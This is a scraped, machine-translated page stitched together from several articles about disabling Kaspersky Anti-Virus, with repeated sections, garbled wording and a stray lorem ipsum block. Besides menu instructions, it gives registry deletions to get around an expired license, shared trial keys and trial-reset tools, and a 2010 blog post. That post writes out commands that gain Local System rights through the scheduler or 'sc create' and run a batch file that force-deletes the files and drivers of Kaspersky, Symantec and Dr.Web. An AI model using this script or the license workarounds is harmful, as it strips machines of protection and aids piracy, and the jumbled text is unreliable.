Many users have the need to disable Kaspersky Anti-Virus for a while. Reasons for the implementation of this procedure can be a great set: false responses, installation of pirate software and games, software conflicts, Run another antivirus program etc.

However, not everyone knows how to turn off Kaspersky correctly for a while.

In this article we will talk in detail about possible methods Disabling this antivirus program.

Temporary deactivation

To temporarily disable antivirus:

1. Move the cursor to the Kaspersky icon in the tray (right part of the taskbar).

2. Clause the right mouse button.

3. In the context menu, the Clazzo clause "Suspension ...".

4. Select the suspension mode:

"... at the specified time," turn off Kaspersky to the time period specified in the drop-down list. Click in the first paragraph "1 minute" inscription and select the desired value (3 minutes, 5 minutes .... 3 hours, 5 hours).

"... before restarting the program" - the antivirus is activated only after restarting;

"Suspend" - deactivation for an indefinite period: Kaspersky will be disconnected until the user turns on it again.

5. After selecting the mode, click the "Suspend Protection" button.

6. Confirm the action: in the "Attention!" Candle "Continue".

Note. In the confirmation request, you can set the request reactance in the next 30 minutes. To do this, you need to install a "bird" mouse in the superstructure window.

7. After suspension, the message "Protection does not work" will appear. On the anti-virus icon in the tray, the symbol will appear exclamation point"(Warning that protective software is disabled).

Other ways of disconnection

You can use other options for deactivating Kaspersky Anti-virus program.

Method # 1.

1. Click on the program icon in the tray. In the menu, click "Settings".

2. On the General tab, in the "Protection" column, click the mouse click the position of the slider to "OFF".

Attention! Here, on the General tab, you can disable automatic start Anti-virus when enabling a computer.

Method # 2.

You can still completely unload protective software from memory - close the program.

1. Open the menu in the tray and select "Exit".

2. Confirm the closing of the application: Click "Continue" in the query panel.

After activating the output, the icon from Treya will disappear. To start the antivirus again, you need to use its directory in the Start menu.

Disable self-defense

If you need to turn off Kaspersky self-defense - a special software mechanism that prevents the modification of antivirus elements - execute this instruction:

1. Go to the program settings and click the Advanced tab.

2. In the list on the right, select "Self-defense".

3. Click the mouse to remove the "tick" in the "Enable self-defense" row.

4. Confirm the request: click "Continue."

Be careful, turning off Kaspersky Anti-Virus! During his deactivation, your PC has no protection and may be subject to all kinds of viral attacks. After completing the necessary procedures, you must activate the protective software again. If there is a constant need to disconnect the antivirus when you start a specific application or download a particular website, it is advisable to add them to exceptions and not resort to temporary deactivation.

As is known, the self-defense of Kaspersky Anti-Virus is a component that performs the role of anti-virus anti-malware protection softwaretrying to harm the work of the antivirus program or delete it from the computer. Disable self-defense Quite simple - from the settings menu. However, you can not always do it. In this article, find out what to do if kaspersky self-defense is not turned off And how to fix it.

How to turn off Kaspersky self-defense

Under normal conditions Self-defense kaspersky Turns off in the menu Settings → Additionally → Self-defense. To get into the settings is necessary in the lower right corner of the main program window, click on the gear icon.

Then click Self-defense, Receive the checkbox with the inscription Include self-defense .

Kaspersky self-defense is not active

Upon expiration of the license on the use of Kaspersky, its work is suspended, and most of the functions are blocked. Among such functions and self-defense. To restore the work of the protection components, you must activate Kaspersky on a new license or use the following solution to solve the problem.

1. Delete Kaspersky using the Kaspersky Kaspersky Lab product removal utility. Run the utility, agree with the license terms. Select the Kaspersky version you want to delete, enter the Capper code to the appropriate field and click Delete .

After deletion, the system will propose to restart the computer - refuse to reboot. Let's do it later.

HKEY_LOCAL_MACHINE \\ Software \\ Kasperskylab

Remove it. Yes, delete, right-click ...

HKEY_LOCAL_MACHINE \\ SOFTWARE \\ Microsoft \\ SystemCertificates \\ SPC

delete.

4. Restart the computer.

5. After starting the system, install the antivirus. If you do not have an activation file, you can use the 30-day product version. After activation, all components will become available.

01.08.2019

As you know, the self-defense of Kaspersky Anti-Virus is a component that performs the role of protecting the antivirus itself from malicious software trying to harm the work of the antivirus program or delete it from the computer. Disable self-defense Quite just - from the settings menu. However, you can not always do it. In this article, find out what to do if kaspersky self-defense is not turned off And how to fix it.

Self-defense kaspersky

How to turn off Kaspersky self-defense

Under normal conditions Self-defense kaspersky Turns off in the menu Settings → Additionally → Self-defense. To get into the settings is necessary in the lower right corner of the main program window, click on the gear icon.

Then click Self-defenseand uncheck the checkbox opposite the inscription Include self-defense .

Kaspersky self-defense is not active

Upon expiration of the license on the use of Kaspersky, its work is suspended, and most of the functions are blocked. Among such functions and self-defense. To restore the work of the protection components, you must activate Kaspersky on a new license or use the following solution to solve the problem.

1 Remove Kaspersky using the Kaspersky Lab Production Utility. To do this, run the utility, agree with the license terms. In the window that appears, select the Kaspersky version you want to delete, enter the Capper code to the appropriate field and click Delete .

After deleting the system, will offer to restart the computer. Reboot. Let's do it later.

2 12 395 0

In certain situations, it becomes necessary to turn off Kaspersky. For example, if you need to open a specific page, but the program determines it as potentially dangerous, or malicious. Also, many know that antiviruses are removed to quarantine all sorts of cracks and programs for hacking licenses in software. In this case, there is no other exit, except to turn off Kaspersky self-defense at work with such utilities.
Before turning off Kaspersky, keep in mind that after that the antivirus becomes inactive, that is, your system is absolutely unprotected to all sorts of malware and viruses. Thus, you are uploading yourself to a potential danger.

You will need:

In order to disable the Kaspersky versions of 2010, you will need to open the main window of the Anti-Virus (you can do this twice by clicking on the program shortcut in the taskbar, using the label on the desktop, or finding Kaspersky Anti-Virus among installed programs In the "Start" menu.

After that, in the upper right window we are looking for the "Settings" button. The settings window appears before you, in the left working area of \u200b\u200bwhich the "Parameters" section will be available. We go into it, and remove the checkbox next to the "Enable self-defense" string. Confirm the changes by clicking the "OK" button, and close the settings menu. It is easier than to use Kaspersky Rescue Disk.

In the case of the 2011 version, the procedure will be similar. Also, as in the past case, open the settings window (it is in the same place). After that, go to the "Self-Protection" tab. We look at the window that is located on the right side: there is looking for the "Enable self-defense" option.

In order to turn off Kaspersky 2011 by checkbox near this item, and we save the changes using the "OK" button. After completion, be sure to include self-defense. If necessary, activate the program or extend trial version Kaspersky.

Cautions

As we say, turning off the self-defense of the antivirus, you will not be able to check the computer to viruses and dress it on a potential danger. So do it only in case of extreme necessity, and only if you are one hundred percent sure that the link you want to go is absolutely safe; A program that is going to run or install does not harm your operating system.

Remember that preventing the penetration of malicious software is much easier than to fight with the consequences of their activity.

Many users have the need to disable Kaspersky Anti-Virus for a while. Reasons for the implementation of this procedure can be a great set: false responses, installation of pirate software and games, software conflicts, launching another antivirus program, etc.

However, not everyone knows how to turn off Kaspersky correctly for a while.

In this article we will talk in detail about the possible ways to disable this antivirus program.

Temporary deactivation

To temporarily disable antivirus:

1. Move the cursor to the Kaspersky icon in the tray (right part of the taskbar).

2. Clause the right mouse button.

3. In the context menu, the Clazzo clause "Suspension ...".

4. Select the suspension mode:

"... at the specified time," turn off Kaspersky to the time period specified in the drop-down list. Click in the first paragraph "1 minute" inscription and select the desired value (3 minutes, 5 minutes .... 3 hours, 5 hours).

"... before restarting the program" - the antivirus is activated only after restarting;

"Suspend" - deactivation for an indefinite period: Kaspersky will be disconnected until the user turns on it again.

5. After selecting the mode, click the "Suspend Protection" button.

6. Confirm the action: in the "Attention!" Candle "Continue".

Note. In the confirmation request, you can set the request reactance in the next 30 minutes. To do this, you need to install a "bird" mouse in the superstructure window.

7. After suspension, the message "Protection does not work" will appear. On the anti-virus icon in the tray, the exclamation mark symbol is displayed (a warning that protective software is disabled).

Other ways of disconnection

You can use other options for deactivating Kaspersky Anti-virus program.

Method # 1.

1. Click on the program icon in the tray. In the menu, click "Settings".

2. On the General tab, in the "Protection" column, click the mouse click the position of the slider to "OFF".

Attention! Here, on the General tab, you can disable the automatic start of the antivirus when the computer is turned on.

Method # 2.

You can still completely unload protective software from memory - close the program.

1. Open the menu in the tray and select "Exit".

2. Confirm the closing of the application: Click "Continue" in the query panel.

After activating the output, the icon from Treya will disappear. To start the antivirus again, you need to use its directory in the Start menu.

Disable self-defense

If you need to turn off Kaspersky self-defense - a special software mechanism that prevents the modification of antivirus elements - execute this instruction:

1. Go to the program settings and click the Advanced tab.

2. In the list on the right, select "Self-defense".

3. Click the mouse to remove the "tick" in the "Enable self-defense" row.

4. Confirm the request: click "Continue."

Be careful, turning off Kaspersky Anti-Virus! During his deactivation, your PC has no protection and may be subject to all kinds of viral attacks. After completing the necessary procedures, you must activate the protective software again. If there is a constant need to disconnect the antivirus when you start a specific application or download a particular website, it is advisable to add them to exceptions and not resort to temporary deactivation.

Lorem Ipsum Is Simply Dummy Text of the Printing and Typesetting Industry. Lorem Ipsum Has Been The Industry "S Standard Dummy Text Ever Since The 1500s, When An Unknown Printer Took a Galley of Type and Scrambled It to make a Type and SCRAMEN BOOK. IT HAS SURVED NOT ONLY FIVE http://jquery2dotnet.com/ Centuries , but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.

If you are read this article, then surely ask yourself a question on how to turn off Kaspersky self-defense if you have ended the license period and the self-defense menu item is not active, i.e. nothing can be changed in it. This article will help you disable self-defense to make and get a new key.

How to disable self-defense if there is no license

To begin with, it is worth saying that there are two ways to do this, one way with the removal of Kaspersky Anti-Virus, and the second with boot windows in safe mode. In fact, both methods will eventually give the same result. I'll start talking with a more accessible method for simple users through the removal of the program.

2. Run this program And agree with the license agreement.

After removing Kaspersky, click OK And reboot the computer.

In the row appeared, enter the command regedit. And click OK.

Before us editor windows registry. Now it is necessary to delete some keys (folders). They are at:

HKEY_LOCAL_MACHINE \\ SOFTWARE \\ Kasperskylab.

HKEY_LOCAL_MACHINE \\ SOFTWARE \\ Microsoft \\ SystemCertificates \\ SPC.

Those. Using as a conductor, and you need to delete by the above addresses "folders" Kasperskylab. and SPC.For this you will need to click on them right mouse button and select item " Delete".

4. After how you coped with deleting key data, we close the registry editor and now download the desired Kaspersky product from the official website of Kaspersky Total Security or Kaspersky Internet Security , I set the downloaded Kaspersky Anti-Virus and launch it. After which we see that the program asks to enter license key Or get a trial version, while the self-defense tab has become active again and it can be turned off.

The second way to disable self-defense, if there is no license

It lies in the fact that you need to restart the computer into a safe mode already in safe mode to do the same operations starting with point 3. This instruction. Those. No need to delete Kaspersky before climbing the registry. Those. They started in safe mode, deleted the same keys in the registry and rebooted as usual, then we get access to blocked self-defense.

In the video, just below shows the process of disconnecting blocked self-defense, and you can visually evaluate the data of manipulation, in fact everything is very simple.

On this page you will find Kaspersky Anti-Viruses 2013-2018 codes. As well as dump utilities trial period (Retrienes).

At the time of publication all the keys and codes of workers (verified).

Codes for KIS and KAV 2013, 2014, 2015, 2016, 2017 and 2018

Official trial (trial) codes. Attention! Before activation, reset the trial period using Kaspersky Reset Trial (Look below). Otherwise, it is not activated or activated for 30 days or less.

4Ch4C-PPFDT-NFK4B-45R69 - 90 days (KIS 2014 - 2018)
XZBB7-UZFBN-E8GAD-9GZUF - 60 days (KIS 2013 - 2018)

JHJ7C-C69PX-MQY3J-PKG5B - 90 days (KAV 2013-2018)
52mFR-XMPS3-RPXBM-K6T5E - 90 days (KAV 2014-2018)

For activation, use proxy France.
Proxy You need to enter in the settings \u003d\u003e Advanced \u003d\u003e Network \u003d\u003e Proxy settings (at the bottom).
After activation, turn off the proxy.

Japxz-9g9ej-csuv2-7yqus - 45 days

After 90 days, reset the trial period again and re-activate the antivirus for 90 days. And then also again ...

1. Damps licenses
   Dumps will no longer. The keys quickly bantas and then the antivirus ceases to be updated. Therefore, now, there is no sense from the dump.
2. Codes per year and more
   Free long codes will not be too. Do not look for online - workers will not find. They are banyed quickly, even if they appear.
   • Now the most working option for KIS. - It is activation using trial codes for 90 days, which are above. After expiration, we drop the trial period and activate again. I think it's not difficult to press a couple of buttons once every 3 months.
   • For Kav. there is journal keys, but there is little sense from them, because Most often they are given for 30 days. The easiest way to reset the trial period every month. Also on this time There is a 90-day code. Reset the trial period and activate. All as S. KIS..
   • The same for Kts. - The easiest way to reset the trial period every month. Sometimes there are shares on the distribution of keys on average for 3 months.
3. What is the result?
   Freebies as before (keys for 1-3 years, dumps per year and more, bought codes) More, most likely will not. Caspera have been done in recent years big work To combat this. They often monitor sites where they distribute the keys to immediately ban them. All you find on the Internet is mainly either workers or any deception.

Trial Reset for Kaspersky (Retrield - Resetting the trial period):

Kaspersky Reset Trial

Kaspersky Reset Trial - An excellent tool for resetting the trial period and activation using Kaspersky Anti-Viruines Dampa.

Kaspersky Antivirus. 2012.
Kaspersky Antivirus 2012.
Kaspersky Antivirus 2013.
Kaspersky Antivirus 2014.
Kaspersky Antivirus 2015.
Kaspersky Antivirus 2016.
Kaspersky Antivirus 2017.
Kaspersky Antivirus 2018.

Kaspersky Internet Security 2012
Kaspersky Internet Security 2013
Kaspersky Internet Security 2014
Kaspersky Internet Security 2015
Kaspersky Internet Security 2016
Kaspersky Internet Security 2017
Kaspersky Internet Security 2018

Kaspersky Total Security 2015
Kaspersky Total Security 2016
Kaspersky Total Security 2017
Kaspersky Total Security 2018

Kaspersky Free Antivirus 2016
Kaspersky Free Antivirus 2017
Kaspersky FREE Antivirus 2018

Kaspersky Crystal 2.0.
Kaspersky Crystal 3.0

Kaspersky Endpoint. Security 8.
Kaspersky Endpoint Security 10

Kaspersky Small Office Security 2
Kaspersky Small Office Security 3
Kaspersky Small Office Security 4
Kaspersky Small Office Security 5

Download Kaspersky Reset Trial 5.1 -

Kastrial.

Kastrial.- Utility to reset the test period of Kaspersky Antivirus.

All Kastrial features:

• Kaspersky activation using the key
  Now you do not need to enter the beta code with the Internet disabled, so that you can activate using the key.
• Extraction of Kaspersky key
  You can display the key and activation code from Kaspersky.
• Ability to complete KSN
  Kaspersky Security Network (KSN) is a "cloud" antivirus technology. Now you can completely disable it.
• Removing trial reminders
  Removes a reminder of the use of a trial license, about requesting a license.

Supported products:

• KIS / KAV 2010, 2011, 2012, 2013
• Kaspersky Crystal (Pure) (to Crystal 2012)
• KAV 6.0.4.1424 WKS MP4
• Kaspersky Small Office Security 2 (for file Servers and PC)
• Kaspersky Endpoint Security 8

As you know, the self-defense of Kaspersky Anti-Virus is a component that performs the role of protecting the antivirus itself from malicious software trying to harm the work of the antivirus program or delete it from the computer. Disable self-defense Quite just - from the settings menu. However, you can not always do it. In this article, find out what to do if kaspersky self-defense is not turned off And how to fix it.

Self-defense kaspersky

How to turn off Kaspersky self-defense

Under normal conditions Self-defense kaspersky Turns off in the menu Settings → Additionally → Self-defense. To get into the settings is necessary in the lower right corner of the main program window, click on the gear icon.

Then click Self-defenseand uncheck the checkbox opposite the inscription Include self-defense .

Kaspersky self-defense is not active

Upon expiration of the license on the use of Kaspersky, its work is suspended, and most of the functions are blocked. Among such functions and self-defense. To restore the work of the protection components, you must activate Kaspersky on a new license or use the following solution to solve the problem.

1 Remove Kaspersky using the Kaspersky Lab Production Utility. To do this, run the utility, agree with the license terms. In the window that appears, select the Kaspersky version you want to delete, enter the Capper code to the appropriate field and click Delete .

After deleting the system, will offer to restart the computer. Reboot. Let's do it later.

When using Kaspersky Anti-Virus, sometimes there are situations when protection must be turned off for a while. For example, you need to download some the desired file.And the antivirus system does not miss it. The program has such a function that allows you to turn off the protection for 30 minutes using one button, after this time has expired, the program will remind yourself. This was done so that the user would not forget to turn on the protection, thereby exposing the system of danger.

Turn off Kaspersky Anti-Virus

1. In order to temporarily disable Kaspersky Anti-Virus, we go into the program, we find "Settings".

2. Go to the tab "General". At the very top of the protection slider, change off. Antivirus is disabled.

You can check it in the main program window. When the protection is turned off, see the inscription "Protection is turned off".

3. The same can be done by pressing the right mouse button on the Kaspersky icon, which is located on the bottom panel. Here you can pause protection for a certain period of time or coming. You can choose the option before rebooting, i.e. protection to turn on after the computer overload.

How to copy the settings and self-defense of Kaspersky 2010

After setting all the parameters of Kaspersky Anti-Virus at its discretion, you can export or import For later use the settings template on other computers where a similar application has been installed. For example, copy antivirus settings with home Computer And using the created template, you quickly configure application operation options on your work computer or on other home network computers.

All parameters are saved as a special configuration file. In order to save the current antivirus settings template, it is necessary to carry out operation. export specified parameters Application works by performing the following sequence of actions. In the main application window, click on the " Setting", After that, in the window that opens in the Object menu, select the section" Parameters" In the central part of the window, going to the block " ", Click on the" button " Save" The window will appear on the screen. Select a configuration file"In which you want to set the name of the stored file and the folder to which it will be placed. This file is assigned expansion. CFG (SI-EF GI). Close the button by pressing the button " Save».

For the subsequent import of the parameters of the antivirus from a previously saved configuration file in the main application window, click on the button " Setting"And in the window that opens in the menu section on the left, select the section" Parameters" Going to the block " Manage program parameters", Click on the" button " Download" In the window that appears, find the saved configuration file., then click on the button " Open».

To secure the application from penetration into it system files and settings of various viruses trying to prevent its work, the specialty of Kaspersky Anti-Virus enters special function of self-defense and protection against remote exposure. When using antivirus in Microsoft Windows. Vista and 64-bit operating systems This feature is limited to the control of the self-defense mechanism of the application from the change or delete its own files on the disk, and records in the system registry.

To enable the function antivirus self-defense In the main application window, click on the " Setting" In the window that appears in the menu section on the left, select the section " Parameters" Going to the block " Self-defense", Check the box" Include self-defense».

If you want to block remote access To control the functions and components of the antivirus, in the block " Self-defense»Check the box" Disable the ability external control system service" At the same time, in case of detection of access to the control of anti-virus services, the appropriate notification will appear above the application icon in the application panel notification area.

(0)

Interface Overview I. general settings
	1.	Introduction Kaspersky Installation 2010.	2:24	0	5848
	2.	Context menu overview of the KAV 2010 program menu	2:04	2	1517
	3.	Basic application window	3:03	0	1286
	4.	Setting general settings	2:21	0	1427
	5.	Import / export of antivirus parameters and work with fun ...	3:04	0	4248
	6.	Master initial setting Antivirus	2:45	0	2271
	7.	Setting up trusted applications	2:35	0	2734
	8.	Configure exception rules	2:47	0	1783
	9.	Setting notifications	2:46	0	1619
Work with the section "Protection"
	10.	Overview of the "Files and Personal Data" subsection	2:12	0	1149
	11.	Review of the subsection "Systems and Programs"	2:56	0	925
	12.	Working with the section "Networking"	2:14	0	984
Working with the file File Antivirus
	13.	Overview of the File Anti-Virus component	2:29	0	1550
	14.	Settings Settings Subsection "File Antivirus"	2:45	0	789
	15.	Advanced File Anti-Virus Settings	2:52	0	885
	16.	Configure composite file check options	3:13	0	848
Working with the "Postal Antivirus" component
	17.	Overview of the "Postal Antivirus" component	3:23	0	838
	18.	Highlights of the Mail Anti-Virus	3:27	0	854
	19.	The task additional settings Mail Antivirus	2:50	0	766
Working with the "Web Antivirus" component
	20.	Overview of the "Web Antivirus" component	2:15	0	664
	21.	Features of the "Web Antivirus" component	2:24	0	1064
	22.	Changing web antivirus settings	2:10	0	936
	23.	Setting the parameters of the protection area and reaction to the ONN ...	2:32	0	743
	24.	Change settings heuristic analysis and optimi ...	3:04	0	906
	25.	Check protected compounds	3:10	0	3180
Computer check for viruses
	26.	Description of the "Virus Check" function	2:16	0	1326
	27.	Setting the basic check parameters	2:56	0	1323
	28.	Extra options Checks	2:19	0	876
	29.	Start checking and working with a report	2:24	0	2271
	30.	Setting Launch Mode	2:01	0	956
	31.	Setting up optimization and general verification parameters	1:42	0	1392
	32.	Setting the scan of composite files	1:58	0	795
Working with the "Update" section
	33.	Overview of the "Update" function	1:59	0	2248
	34.	Highlights of working with the "Update" function	2:47	0	1170
	35.	Changing Settings and Start Update Procedure	3:09	0	1514
	36.		3:18	0	5101

July 6, 2010 at 01:28

Self-defense of antiviruses or cut antivirus without knife

• Antivirus defense

Hello everybody!

Recently, we have already discussed the power of the heuristic technologies of modern antiviruses and came to the opinion that it is impossible to believe anyone. Even sometimes yourself :)

Today we will talk about another controversial moment of antivirus - self-defense. Some vendors are very serious about this moment, and their products even stand in complex comprehensive cases of active infection, effectively removing viral interceptions, setting into the system and even subsequently, removing already well-speaking malware. Others believe that active infection - This is a battle with windmills, not leading anything to anything, and therefore - LiveCD, and in some cases and Format C:

We will give tribute to both opponents: Of course, if there is an opportunity to defeat the viral confrontation - this is good. If only this does not lead to the BSods and loading the system for a couple of days. And it is absolutely obvious that with serious and complex infection it is often impossible to break through the active mass of interceptions, malicious processes at the level of the nucleus and other things - and therefore it is often more difficult to treat the inactive system (with LiveCD or scanning the hard drive on an unrelated machine), but in the case a variety of file infection - and think about full reinstall OS.

But we will not indulge in disputes - we will leave it for the next article :) Let's talk about simple: about the self-defense system even on a deliberately unrelated system. And we accept a priori:

1) there is an integrated product Antivirus + Hips + Firewall;
2) the system was unrected, but somehow penetrated the malicious code;
3) Malicious code has its intention to remove antivirus or damage it so much to ensure complete inoperability.

Actions will be the easiest - an attempt to remove vital important files Antivirus with Local System rights. The idea of \u200b\u200bthis approach belongs to my good friend Alexei Barana, who reported on it in closed circles some time ago. Time passed, we will assume that the vendors pulled up - check it.

On Windows systems, working under the administrator (and this, probably, 80% of all systems) get the rights of Local System simply. In the head immediately comes two ways that are well described on the network.

Method 1. Using a scheduler.
By default, all Windows systems work task scheduler. This service launches tasks with the laws of Local System. Then it's very easy to add task somehow:
AT 11:05 C: \\ killer.bat
And Kill.bat will start with Local System rights.

The advantages are obvious: everything is simple and clear. Disadvantage: The user can notice a strange new task in the scheduler, and just to disable this service for security purposes.

Method 1. Creating a service.
The essence of the method is to create a service, it starts and deleting it. In this case, everything is implemented in three lines:
SC CREATE CMDASSYSTEM TYPE \u003d OWN TYPE \u003d INTERACT BINPATH \u003d "CMD / C START / LOW / B CMD / C (C: \\ killer.bat)"
NET START CMDASSYSTEM.
SC Delete Cmdassystem

It's notity that killer.bat. It will start with the IDLE priority, it will also be launched on behalf of Local System.
The method is invisible, does not manifest itself.

At the time of publishing the KIS 2010 article, both methods missed at Hips level, without even requesting any permissions.

Well, now let's go to the very killer.bat. (In our case, it is located in the root on the disk with, but it is clear that you can throw it anywhere).

The essence of this file is simple: We remove everything that belongs to the antivirus. So, for Kaspersky 2010 it will be:
Net Stop Srservice.
ERASE / F / S / Q "C: \\ Program Files \\ Kaspersky Lab \\ Kaspersky Internet Security 2010"
ERASE / F / S / Q "% WINDIR% \\ SYSTEM32 \\ DRIVERS \\ KL1.SYS"
ERASE / F / S / Q "% WINDIR% \\ SYSTEM32 \\ Drivers \\ klif.sys"
Erase / F / S / Q "% WinDir% \\ System32 \\ Drivers \\ klbg.sys"
ERASE / F / S / Q "% WINDIR% \\ System32 \\ Drivers \\ klim5.sys"
ERASE / F / S / Q "% WINDIR% \\ System32 \\ Drivers \\ klmd.sys"
ERASE / F / S / Q "% WINDIR% \\ System32 \\ Drivers \\ klmouflt.sys"

For Symantec something like (who knows more precisely - correct, I myself am on Kaspersky):
Net Stop Srservice.
ERASE / F / S / Q "C: \\ Program Files \\ Symantec"
ERASE / F / S / Q "C: \\ Program Files \\ Norton Internet Security"

For Dr. Web:
Net Stop Srservice.
ERASE / F / S / Q "C: \\ Program Files \\ Drweb"
ERASE / F / S / Q "% WINDIR% \\ System32 \\ Drivers \\ DWPROT.SYS"
ERASE / F / S / Q "% WINDIR% \\ System32 \\ Drivers \\ drwebaf.sys"
ERASE / F / S / Q "% WINDIR% \\ System32 \\ Drivers \\ drwebpf.sys"
ERASE / F / S / Q "% WINDIR% \\ System32 \\ Drivers \\ Spiderg3.sys"
Shutdown -R -F -C "BYE-BYE !!!"

It is clear that the similar script can be prescribed for all antiviruses - the essence of changing ways to vital files.

TOTAL - What do we have?

1. KIS 2010 received such damage that was killed, and the system remained without protection. KIS 2011 is deprived of this sexual weakness - but he is still a beta ...
2. NIS lost multiple files, but performance has not been violated, the files were subsequently downloaded and restored when updating from the Internet.
3. Drweb did not suffer at all, which was expected, taking into account the special focus of the developer to confront the infection. But do not forget that there is a spidie for the web ...

At the same time, hips of these products quietly missed both variants of manipulations (Kisa checked personally).

CONCLUSIONS
Unfortunately, it is necessary to state the fact that some of the existing antiviral solutions have a number of vulnerabilities that can be used to damage protection and actually remove the antivirus from the computer.

Offered in the comments to add observations and research on others. antivirus Products (preferably with hips to evaluate the level of blocking actions to receive Local System). I think that the described manipulations are understandable and can be easily reproduced on virtual machines enthusiasts.

• self-defense
• vulnerabilities
• antivirus

Add Tags

IN Kaspersky Anti-Virus You can pause protection, that is, to disconnect for a while all the components of the program, as well as resume it.

Suspending the Program Protection Indicates only disabling protection components. Suspension of protection does not affect the verification and update in Kaspersky Anti-Virus.

2. How to suspend protection

You can choose one of the following protection modes:

• - Protection will be enabled through the specified time interval. Protection will be enabled to the set time if you restart the program or restart the system:
  • If a switched on
  • If a turned off ).
• - Protection will be enabled after restarting the program or restarting the system:
  • If a switched on Automatic program start, protection will be turned on automatically.
  • If a turned off Automatic launch of the program, to enable protection, you must run the program manually ( Start - All Programs - Kaspersky Anti-Virus).
• Suspend - Protection will be enabled only when you decide to resume protection.

Suspending protection from the context menu

To pause a computer protection from the program context menu, follow these steps:

1. In the window Saving protection Select one of the items:
   • Suspend at the specified time
   • Suspend before reboot.
   • Suspend.

Saving protection from Kaspersky Gadget

You can suspend protection with a gadget Kaspersky Gadget. . For this Kaspersky Gadget. Must be configured in such a way that the function is assigned one of its buttons. Saving protection.

To pause a computer protection using Kaspersky Gadget., follow these steps:

1. In the window Saving protection Select one of the items:

• Suspend at the specified time (In the field below, specify the period of time through which protection will be resumed).
• Suspend before reboot.
• Suspend.